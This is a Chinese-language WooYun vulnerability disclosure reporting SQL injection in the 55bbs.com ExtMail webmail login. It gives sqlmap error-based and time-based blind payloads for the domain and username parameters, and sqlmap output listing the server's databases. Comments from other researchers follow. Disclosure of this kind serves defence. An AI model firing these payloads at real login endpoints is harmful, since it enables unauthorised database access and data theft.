55bbs邮件系统SQL注射

admin 2017年3月26日13:46:44评论466 views字数 211阅读0分42秒阅读模式
摘要

2016-03-21: 细节已通知厂商并且等待厂商处理中
2016-03-21: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-03-26: 厂商已经主动忽略漏洞,细节向公众公开

漏洞概要 关注数(9) 关注此漏洞

缺陷编号: WooYun-2016-187368

漏洞标题: 55bbs邮件系统SQL注射

相关厂商: 55bbs.com

漏洞作者: 路人甲

提交时间: 2016-03-21 17:59

公开时间: 2016-03-26 18:00

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

2人收藏


漏洞详情

披露状态:

2016-03-21: 细节已通知厂商并且等待厂商处理中
2016-03-21: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-03-26: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

55bb邮件系统sql注射

注射链接:

mask 区域
1.http://**.**.**/extmail/cgi/index.cgi_
2.http://**.**.**/extmail/cgi/index.cgi

注入参数:

Parameter: domain (POST)

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl

ause

Payload: username=admin&password=2121&domain=55bbs.com' AND (SELECT 2116 FRO

M(SELECT COUNT(*),CONCAT(0x7162716a71,(SELECT (ELT(2116=2116,1))),0x71787a6b71,F

LOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'mtIe

'='mtIe&nosameip=on

Parameter: username (POST)

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl

ause

Payload: username=admin' AND (SELECT 8134 FROM(SELECT COUNT(*),CONCAT(0x7162

716a71,(SELECT (ELT(8134=8134,1))),0x71787a6b71,FLOOR(RAND(0)*2))x FROM INFORMAT

ION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'tHuA'='tHuA&password=2121&domain=55

bbs.com&nosameip=on

Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

Payload: username=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))XEQZ) AND 'DGq

G'='DGqG&password=2121&domain=55bbs.com&nosameip=on

漏洞证明:

Parameter: domain (POST)

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause

Payload: username=admin&password=2121&domain=55bbs.com' AND (SELECT 3084 FROM(SELECT COUNT(*),CONCAT(0x7170767671,(SELECT (ELT(3084=3084,1))),0x716b627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'EkhN'='EkhN&nosameip=on

Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

Payload: username=admin&password=2121&domain=55bbs.com' AND (SELECT * FROM (SELECT(SLEEP(5)))LJhz) AND 'Vcus'='Vcus&nosameip=on

Parameter: username (POST)

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause

Payload: username=admin' AND (SELECT 7724 FROM(SELECT COUNT(*),CONCAT(0x7170767671,(SELECT (ELT(7724=7724,1))),0x716b627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'AqVK'='AqVK&password=2121&domain=55bbs.com&nosameip=on

Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

Payload: username=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))gwoO) AND 'eZmf'='eZmf&password=2121&domain=55bbs.com&nosameip=on

---

there were multiple injection points, please select the one to use for following injections:

[0] place: POST, parameter: domain, type: Single quoted string (default)

[1] place: POST, parameter: username, type: Single quoted string

[q] Quit

> 0

[17:03:12] [INFO] the back-end DBMS is MySQL

web application technology: Nginx

back-end DBMS: MySQL 5.0

[17:03:12] [INFO] fetching database names

[17:03:12] [INFO] the SQL query used returns 3 entries

[17:03:12] [INFO] resumed: information_schema

[17:03:12] [INFO] resumed: extmail

[17:03:12] [INFO] resumed: test

available databases [3]:

[*] extmail

[*] information_schema

[*] test

55bbs邮件系统SQL注射

修复方案:

参数过滤!

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-03-26 18:00

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

  1. 2016-03-26 23:17 | U神 ( 核心白帽子 | Rank:1375 漏洞数:152 | 乌云核心菜鸟,此号长期由联盟托管,如果近...)

    2

    想不通一个这么吊的邮箱居然在这么显眼的地方出现SQL诸如

  2. 2016-03-31 23:50 | 你大爷在此 百无禁忌 ( 路人 | Rank:18 漏洞数:9 | 迎风尿三丈 顺风八十米)

    1

    靠 这个洞 你提交过了? 尼玛 我刚提交 居然一模一样 醉了

  3. 2016-03-31 23:51 | 你大爷在此 百无禁忌 ( 路人 | Rank:18 漏洞数:9 | 迎风尿三丈 顺风八十米)

    1

    本屌表示不服

  4. 2016-03-31 23:52 | 你大爷在此 百无禁忌 ( 路人 | Rank:18 漏洞数:9 | 迎风尿三丈 顺风八十米)

    1

    @U神 extmail的cgi注入

  5. 2016-04-01 00:27 | U神 ( 核心白帽子 | Rank:1375 漏洞数:152 | 乌云核心菜鸟,此号长期由联盟托管,如果近...)

    1

    @你大爷在此 百无禁忌 我知道是通用系统漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin